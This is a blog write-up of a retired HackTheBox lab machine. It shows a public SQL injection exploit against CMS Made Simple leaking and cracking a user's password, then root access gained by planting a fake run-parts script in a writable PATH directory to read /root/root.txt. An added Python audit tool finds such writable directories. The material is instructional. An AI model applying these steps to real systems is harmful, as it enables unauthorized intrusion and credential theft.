HTB: Writeup

Posted on 12 Oct 2019 in security • 4 min read


This article is a writeup about a retired HackTheBox machine: Writeup. (Yes, the machine's name is Writeup; searching for a writeup of Writeup is going to be a funny thing.) The machine is rated as easy. It involves a vulnerability in a known CMS as well as a "PATH vulnerability" (a writable directory searched early in a fixed PATH) for the privilege escalation.

[TOC]

Recon

First of all, we scan the machine's open ports with nmap. Only ports 22 (SSH) and 80 (HTTP) are open:

# Nmap 7.80 scan initiated Sun Sep 22 16:08:28 2019 as: nmap -oA nmap -sSV 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.089s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 22 16:08:43 2019 -- 1 IP address (1 host up) scanned in 15.20 seconds

Web, getting user

The homepage of this website is ugly and says that there is nothing there yet. We take a look at robots.txt:

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Let's take a look at /writeup/! There is another website there. Looking at the page source, we notice the use of "CMS Made Simple", a CMS with a few known vulnerabilities.

<!doctype html>
<html lang="en_US"><head>
  <title>Home - writeup</title>

<base href="http://10.10.10.138/writeup/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

Let's search for exploits; a few of them are available:

# searchsploit 'made simple'
-------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)    | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion                               | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting                               | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting                            | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection                                | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities               | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities                                     | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                                           | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                  | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                      | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                                          | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                                         | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting                   | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities                                      | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery                                      | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion                         | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery               | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities                                      | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                                         | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                         | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                         | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning                       | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                                              | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                      | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                 | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload        | exploits/php/webapps/46546.py
-------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result

As we are not authenticated, the one that interests us is "CMS Made Simple < 2.2.10 - SQL Injection" (exploits/php/webapps/46635.py). We run the exploit (admire the beauty of the display) and obtain a username, an email, a password salt and a password hash.

python 46635.py -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

The exploit can also crack the password using a dictionary. We run "rockyou" against it and find jkr's password.

# python 46635.py --crack -w ./rockyou.txt -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

With this password we are able to connect to the box over SSH and get the user flag:

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 22 12:31:00 2019 from 10.10.14.237
jkr@writeup:~$ cat user.txt 
d4e493<redacted>

Root

We enumerate the box without much success. A quick read of the box's forum recommends running pspy on it. We discover that a script is run every time a user connects over SSH.

2019/09/25 07:39:49 CMD: UID=0    PID=4352   | sshd: [accepted]
2019/09/25 07:39:49 CMD: UID=0    PID=4353   | sshd: [accepted]  
2019/09/25 07:40:01 CMD: UID=0    PID=4354   | sshd: jkr [priv]  
2019/09/25 07:40:01 CMD: UID=0    PID=4355   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2019/09/25 07:40:01 CMD: UID=0    PID=4356   | run-parts --lsbsysinit /etc/update-motd.d

The PATH is fixed by the command line, and there is no run-parts binary in its first directory, /usr/local/sbin. Moreover, this directory is writable by our user, so anything we drop there under the name run-parts is found before the real binary and executed as root. Therefore we write a simple file /usr/local/sbin/run-parts and give it execute permission:

jkr@writeup:~$ vim /usr/local/sbin/run-parts
#!/bin/bash
cat /root/root.txt > /tmp/lool/b
rm /tmp/lool/b

jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts

We create a directory in /tmp/ and write the b file there. At the same time we connect over SSH as the jkr user, which triggers the script, and we get the root flag:

jkr@writeup:~$ mkdir /tmp/lool/
jkr@writeup:~$ echo a > /tmp/lool/b
jkr@writeup:~$ tail -f /tmp/lool/b
a
tail: /tmp/lool/b: file truncated
eeba4<redacted>
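The condition exploited above (a fixed PATH whose early entries are writable by an unprivileged user while the invoked binary lives further down the list) is something a defender can audit directly. The following is an added example, not part of the original writeup and not code from pspy: it parses a pspy-style line like the one above, extracts the inline PATH and the command that env will look up, and reports every directory searched before the real binary that the given user could write to. To keep it runnable offline it builds a constructed sandbox tree under a temporary directory (the group-writable /usr/local/sbin, the assumption that jkr belongs to the group owning it, and the uid -1 standing in for a non-owner are all modelling choices); pointing `root` at `/` and passing a real uid and group set audits a live host the same way.

```python
import os
import re
import shutil
import stat
import tempfile

# Constructed log line, modelled on the pspy output quoted in this writeup
# (it is not a capture from the box).
SAMPLE_LOG = ("2019/09/25 07:40:01 CMD: UID=0    PID=4355   | sh -c /usr/bin/env -i "
              "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin "
              "run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new")

# 'PATH=<dirs>' followed by the program that env will resolve through that PATH.
PATH_RE = re.compile(r"\bPATH=(\S+)\s+(\S+)")


def parse_env_path(line):
    """Return (list_of_path_dirs, command) from a line that sets PATH inline,
    or None when the line carries no PATH= assignment."""
    m = PATH_RE.search(line)
    if not m:
        return None
    return m.group(1).split(":"), m.group(2)


def writable_by(dirpath, uid, gids):
    """Permission-bit check: can a principal (uid, set of gids) create files in dirpath?
    Mode bits are used instead of os.access() so the verdict does not depend on
    who runs the audit. Missing directories count as not writable."""
    try:
        st = os.stat(dirpath)
    except FileNotFoundError:
        return False
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def shadowing_dirs(path_dirs, command, uid, gids, root="/"):
    """Walk PATH in lookup order. Every directory searched before the one that
    really holds `command`, and writable by the principal, is a place where a
    planted file of the same name would win the lookup. Returns (hits, real_dir);
    real_dir is None when the command is not found anywhere in PATH."""
    hits = []
    for entry in path_dirs:
        d = os.path.join(root, entry.lstrip("/"))  # root != "/" audits a sandbox tree
        if os.path.isfile(os.path.join(d, command)):
            return hits, d
        if writable_by(d, uid, gids):
            hits.append(d)
    return hits, None


def audit_line(line, uid, gids, root="/"):
    parsed = parse_env_path(line)
    if parsed is None:
        return [], None
    path_dirs, command = parsed
    return shadowing_dirs(path_dirs, command, uid, gids, root)


def build_sandbox():
    """Constructed replica of the relevant part of the box's filesystem (assumption):
    /usr/local/sbin is group-writable and empty, the real run-parts lives in /usr/bin."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    layout = [("usr/local/sbin", 0o775), ("usr/local/bin", 0o755), ("usr/sbin", 0o755),
              ("usr/bin", 0o755), ("sbin", 0o755), ("bin", 0o755)]
    for entry, mode in layout:
        d = os.path.join(root, entry)
        os.makedirs(d)
        os.chmod(d, mode)
    with open(os.path.join(root, "usr/bin/run-parts"), "w") as f:
        f.write("#!/bin/sh\n")  # stand-in for the real binary
    return root


def demo():
    """Audit SAMPLE_LOG against the sandbox as a user who owns none of the
    directories (uid -1, a modelling choice) but belongs to the group owning
    /usr/local/sbin, which is how jkr is assumed to be placed on the box."""
    root = build_sandbox()
    try:
        group = os.stat(os.path.join(root, "usr/local/sbin")).st_gid
        hits, real_dir = audit_line(SAMPLE_LOG, uid=-1, gids={group}, root=root)
        return ([os.path.relpath(h, root) for h in hits],
                os.path.relpath(real_dir, root) if real_dir else None)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    found, real_dir = demo()
    print("real binary in:", real_dir)
    print("writable dirs searched before it:", found)
```

On the sandbox the audit reports /usr/local/sbin as the single directory that precedes the real run-parts and is writable by the modelled user, which is exactly the gap the writeup used. Running the same function over every pspy line that carries a PATH= assignment, with the uid and groups of each local account, lists the root-executed lookups a given user could influence; the fix on a real host is to remove the group or world write bit from those directories (or to stop running the hook through a PATH that includes them).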

Wrapping up

The user step only required running a known exploit without any change. The privilege escalation was really interesting as I had not used pspy before.